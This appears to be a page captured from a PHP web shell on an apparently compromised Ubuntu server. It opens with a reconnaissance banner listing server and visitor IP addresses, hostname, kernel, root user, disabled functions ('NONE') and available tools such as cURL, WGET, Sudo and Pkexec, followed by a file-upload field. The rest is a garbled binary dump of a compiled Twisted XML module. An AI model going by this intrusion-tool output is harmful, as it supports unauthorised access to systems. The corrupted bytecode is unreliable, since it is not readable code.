Server IP : 209.38.156.173 / Your IP : 216.73.216.122 [ Web Server : Apache/2.4.52 (Ubuntu) System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64 User : root ( 0) PHP Version : 8.1.2-1ubuntu2.22 Disable Function : NONE Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /usr/lib/python3/dist-packages/twisted/words/xish/__pycache__/ |
Upload File : |
o �b�s � @ s� d Z ddlmZ ddlmZmZmZ ddlmZ dd� Z ddiZ G d d � d �ZeZd&dd�Z d d� Zdd� Zdd� Zdd� ZG dd� de�ZG dd� d�ZG dd� de�Zee�G dd� d��ZG dd� de�Zdd � ZG d!d"� d"ej�ZG d#d$� d$�Zd%S )'z� DOM-like XML processing support. This module provides support for parsing XML into DOM-like object structures and serializing such structures to an XML string representation, optimized for use in streaming XML applications. � )�cast)� Attribute� Interface�implementer)�suxc C s( | � dd�}t|�dkr|S d|d fS )zSInternal method for splitting a prefixed Element name into its respective parts�:� � Nr )�split�len)�name�ntok� r �;/usr/lib/python3/dist-packages/twisted/words/xish/domish.py�_splitPrefix s r z$http://www.w3.org/XML/1998/namespace�xmlc @ s<